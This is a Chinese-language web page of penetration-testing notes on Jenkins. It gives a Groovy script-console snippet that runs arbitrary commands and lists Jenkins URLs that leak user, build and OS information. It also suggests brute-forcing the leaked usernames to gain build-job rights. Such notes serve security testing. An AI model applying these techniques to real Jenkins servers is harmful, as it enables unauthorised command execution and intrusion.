网站地图    收藏   

主页 > 后端 > 网站安全 >

关于Jenkins安全测试的一些技巧 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 今天mickey牛发来一篇关于hacking Jenkins的文章,受益匪浅,虽然不是很高深的东西,看完几篇相关文章之后记录下要点,为以后做安全测试留下笔记。 文章链接:http: www labofapenetrationtes...

 今天mickey牛发来一篇关于hacking Jenkins的文章,受益匪浅,虽然不是很高深的东西,看完几篇相关文章之后记录下要点,为以后做安全测试留下笔记。
 
    文章链接:
 
        http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html
 
        http://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html
 
        https://www.pentestgeek.com/2014/06/13/hacking-jenkins-servers-with-no-password/
 
    工具链接:
 
        https://wiki.jenkins-ci.org/display/JENKINS/Terminal+Plugin
 
        https://github.com/samratashok/nishang
 
        http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_script_console
 
        https://wiki.skullsecurity.org/Passwords
 
    文章要点:
 
        看了几篇文章说道了一下几个东西:
 
        1.通过自带的groovy script的解析器可以执行命令
 
  1 2 3 4 5 def sout = new StringBuffer(), serr = new StringBuffer() def proc = '[INSERT COMMAND]'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"
 
 
        2.使用强大的powershell脚本,nishang是一个powershell脚本集
 
        3.当我们没有办法进入console script界面执行脚本的时候可以采用以下方法
 
                a.Jenkins的一下目录泄漏了一写开发用户信息
 
                     List of users:
 
                     http://[jenkinsurl]/asynchPeople/
 
                     List of all builds: 
 
                     http://[jenkinsurl]/view/All/builds
 
                      (Seems to be fixed in the latest version 1.575) 
 
                        List publilcy available content:
 
                        http://[jenkinsurl]/userContent/
 
                        Type of the Operating System: 
 
                        http://[jenkinsurl]/computer/    
 
                b.通过泄漏的用户名爆破得到一些有build job权限的用户,然后执行相关命令
 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论